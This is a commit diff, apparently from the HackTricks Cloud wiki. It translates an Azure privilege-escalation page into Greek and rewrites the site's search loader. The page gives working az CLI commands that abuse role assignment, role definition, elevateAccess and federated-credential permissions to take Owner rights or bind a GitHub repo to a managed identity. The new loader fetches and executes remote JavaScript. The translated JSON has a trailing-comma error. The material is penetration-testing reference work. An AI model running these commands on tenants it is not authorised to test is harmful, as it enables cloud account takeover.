Translated ['src/pentesting-cloud/azure-security/az-privilege-escalation

2026-02-04 19:11:41 -08:00 · 2025-04-21 21:02:19 +00:00
parent 9ef5e51740
commit 1ce5164eff
4 changed files with 72 additions and 46 deletions
--- a/searchindex.json
+++ b/searchindex.json
--- a/src/images/venacus-logo.png
+++ b/src/images/venacus-logo.png
--- a/src/pentesting-cloud/azure-security/az-privilege-escalation/az-authorization-privesc.md
+++ b/src/pentesting-cloud/azure-security/az-privilege-escalation/az-authorization-privesc.md
@@ -4,7 +4,7 @@

 ## Azure IAM

-Fore more information check:
+Για περισσότερες πληροφορίες ελέγξτε:

 {{#ref}}
 ../az-services/az-azuread.md
@@ -12,45 +12,40 @@ Fore more information check:

 ### Microsoft.Authorization/roleAssignments/write

-This permission allows to assign roles to principals over a specific scope, allowing an attacker to escalate privileges by assigning himself a more privileged role:
-
+Αυτή η άδεια επιτρέπει την ανάθεση ρόλων σε κύριους σε μια συγκεκριμένη έκταση, επιτρέποντας σε έναν επιτιθέμενο να κλιμακώσει τα προνόμια αναθέτοντας στον εαυτό του έναν πιο προνομιακό ρόλο:
 ```bash
 # Example
 az role assignment create --role Owner --assignee "24efe8cf-c59e-45c2-a5c7-c7e552a07170" --scope "/subscriptions/9291ff6e-6afb-430e-82a4-6f04b2d05c7f/resourceGroups/Resource_Group_1/providers/Microsoft.KeyVault/vaults/testing-1231234"
 ```
-
 ### Microsoft.Authorization/roleDefinitions/Write

-This permission allows to modify the permissions granted by a role, allowing an attacker to escalate privileges by granting more permissions to a role he has assigned.
-
-Create the file `role.json` with the following **content**:
+Αυτή η άδεια επιτρέπει την τροποποίηση των αδειών που χορηγούνται από έναν ρόλο, επιτρέποντας σε έναν επιτιθέμενο να κλιμακώσει τα προνόμια χορηγώντας περισσότερες άδειες σε έναν ρόλο που έχει αναθέσει.

+Δημιουργήστε το αρχείο `role.json` με το εξής **περιεχόμενο**:
 ```json
 {
-  "Name": "<name of the role>",
-  "IsCustom": true,
-  "Description": "Custom role with elevated privileges",
-  "Actions": ["*"],
-  "NotActions": [],
-  "DataActions": ["*"],
-  "NotDataActions": [],
-  "AssignableScopes": ["/subscriptions/<subscription-id>"]
+"roleName": "<name of the role>",
+"Name": "<name of the role>",
+"IsCustom": true,
+"Description": "Custom role with elevated privileges",
+"Actions": ["*"],
+"NotActions": [],
+"DataActions": ["*"],
+"NotDataActions": [],
+"AssignableScopes": ["/subscriptions/<subscription-id>"],
+"id": "/subscriptions/<subscription-id>/providers/Microsoft.Authorization/roleDefinitions/<role-id>",
 }
 ```
-
-Then update the role permissions with the previous definition calling:
-
+Στη συνέχεια, ενημερώστε τις άδειες ρόλου με τον προηγούμενο ορισμό καλώντας:
 ```bash
 az role definition update --role-definition role.json
 ```
-
 ### Microsoft.Authorization/elevateAccess/action

-This permissions allows to elevate privileges and be able to assign permissions to any principal to Azure resources. It's meant to be given to Entra ID Global Administrators so they can also manage permissions over Azure resources.
+Αυτή η άδεια επιτρέπει την αναβάθμιση δικαιωμάτων και τη δυνατότητα ανάθεσης αδειών σε οποιονδήποτε κύριο για πόρους Azure. Προορίζεται να δοθεί στους Παγκόσμιους Διαχειριστές Entra ID ώστε να μπορούν επίσης να διαχειρίζονται άδειες για πόρους Azure.

 > [!TIP]
-> I think the user need to be Global Administrator in Entrad ID for the elevate call to work.
-
+> Νομίζω ότι ο χρήστης πρέπει να είναι Παγκόσμιος Διαχειριστής στο Entra ID για να λειτουργήσει η κλήση αναβάθμισης.
 ```bash
 # Call elevate
 az rest --method POST --uri "https://management.azure.com/providers/Microsoft.Authorization/elevateAccess?api-version=2016-07-01"
@@ -58,27 +53,22 @@ az rest --method POST --uri "https://management.azure.com/providers/Microsoft.Au
 # Grant a user the Owner role
 az role assignment create --assignee "<obeject-id>" --role "Owner" --scope "/"
 ```
-
 ### Microsoft.ManagedIdentity/userAssignedIdentities/federatedIdentityCredentials/write

-This permission allows to add Federated credentials to managed identities. E.g. give access to Github Actions in a repo to a managed identity. Then, it allows to **access any user defined managed identity**.
-
-Example command to give access to a repo in Github to the a managed identity:
+Αυτή η άδεια επιτρέπει την προσθήκη Ομοσπονδιακών διαπιστευτηρίων σε διαχειριζόμενες ταυτότητες. Π.χ. δίνει πρόσβαση σε Github Actions σε ένα repo σε μια διαχειριζόμενη ταυτότητα. Στη συνέχεια, επιτρέπει να **έχει πρόσβαση σε οποιαδήποτε διαχειριζόμενη ταυτότητα που έχει οριστεί από τον χρήστη**.

+Παράδειγμα εντολής για να δώσετε πρόσβαση σε ένα repo στο Github σε μια διαχειριζόμενη ταυτότητα:
 ```bash
 # Generic example:
 az rest --method PUT \
-  --uri "https://management.azure.com//subscriptions/<subscription-id>/resourceGroups/<res-group>/providers/Microsoft.ManagedIdentity/userAssignedIdentities/<managed-identity-name>/federatedIdentityCredentials/<name-new-federated-creds>?api-version=2023-01-31" \
-  --headers "Content-Type=application/json" \
-  --body '{"properties":{"issuer":"https://token.actions.githubusercontent.com","subject":"repo:<org-name>/<repo-name>:ref:refs/heads/<branch-name>","audiences":["api://AzureADTokenExchange"]}}'
+--uri "https://management.azure.com//subscriptions/<subscription-id>/resourceGroups/<res-group>/providers/Microsoft.ManagedIdentity/userAssignedIdentities/<managed-identity-name>/federatedIdentityCredentials/<name-new-federated-creds>?api-version=2023-01-31" \
+--headers "Content-Type=application/json" \
+--body '{"properties":{"issuer":"https://token.actions.githubusercontent.com","subject":"repo:<org-name>/<repo-name>:ref:refs/heads/<branch-name>","audiences":["api://AzureADTokenExchange"]}}'

 # Example with specific data:
 az rest --method PUT \
-  --uri "https://management.azure.com//subscriptions/92913047-10a6-2376-82a4-6f04b2d03798/resourceGroups/Resource_Group_1/providers/Microsoft.ManagedIdentity/userAssignedIdentities/funcGithub-id-913c/federatedIdentityCredentials/CustomGH2?api-version=2023-01-31" \
-  --headers "Content-Type=application/json" \
-  --body '{"properties":{"issuer":"https://token.actions.githubusercontent.com","subject":"repo:carlospolop/azure_func4:ref:refs/heads/main","audiences":["api://AzureADTokenExchange"]}}'
+--uri "https://management.azure.com//subscriptions/92913047-10a6-2376-82a4-6f04b2d03798/resourceGroups/Resource_Group_1/providers/Microsoft.ManagedIdentity/userAssignedIdentities/funcGithub-id-913c/federatedIdentityCredentials/CustomGH2?api-version=2023-01-31" \
+--headers "Content-Type=application/json" \
+--body '{"properties":{"issuer":"https://token.actions.githubusercontent.com","subject":"repo:carlospolop/azure_func4:ref:refs/heads/main","audiences":["api://AzureADTokenExchange"]}}'
 ```
-
 {{#include ../../../banners/hacktricks-training.md}}
-
-
--- a/theme/ht_searcher.js
+++ b/theme/ht_searcher.js
@@ -471,16 +471,53 @@ window.search = window.search || {};
        showResults(true);
    }

-    var branch = lang === "en" ? "master" : lang
-    fetch(`https://raw.githubusercontent.com/HackTricks-wiki/hacktricks-cloud/refs/heads/${branch}/searchindex.json`)
-        .then(response => response.json())
-        .then(json => init(json))        
-        .catch(error => { // Try to load searchindex.js if fetch failed
-            var script = document.createElement('script');
-            script.src = `https://raw.githubusercontent.com/HackTricks-wiki/hacktricks-cloud/refs/heads/${branch}/searchindex.js`;
-            script.onload = () => init(window.search);
-            document.head.appendChild(script);
-        });
+    (async function loadSearchIndex(lang = window.lang || "en") {
+        const branch  = lang === "en" ? "master" : lang;
+        const rawUrl  =
+          `https://raw.githubusercontent.com/HackTricks-wiki/hacktricks-cloud/refs/heads/${branch}/searchindex.js`;
+        const localJs = "/searchindex.js";
+        const TIMEOUT_MS = 5_000;
+      
+        /* helper: inject a <script src=…> and wait for it */
+        const injectScript = (src) =>
+          new Promise((resolve, reject) => {
+            const s   = document.createElement("script");
+            s.src     = src;
+            s.onload  = () => resolve(src);
+            s.onerror = (e) => reject(e);
+            document.head.appendChild(s);
+          });
+      
+        try {
+          /* 1 — download raw JS from GitHub */
+          const controller = new AbortController();
+          const timer      = setTimeout(() => controller.abort(), TIMEOUT_MS);
+      
+          const res  = await fetch(rawUrl, { signal: controller.signal });
+          clearTimeout(timer);
+          if (!res.ok) throw new Error(`HTTP ${res.status}`);
+      
+          /* 2 — wrap in a Blob so the browser sees application/javascript */
+          const code     = await res.text();
+          const blobUrl  = URL.createObjectURL(
+                            new Blob([code], { type: "application/javascript" })
+                          );
+      
+          /* 3 — execute it */
+          await injectScript(blobUrl);
+          return init(window.search);
+        } catch (eRemote) {
+          console.warn("Remote JS failed →", eRemote);
+        }
+      
+        /* ───────── fallback: local copy ───────── */
+        try {
+          await injectScript(localJs);
+          return init(window.search);
+        } catch (eLocal) {
+          console.error("Local JS failed →", eLocal);
+        }
+      })();

    // Exported functions
    search.hasFocus = hasFocus;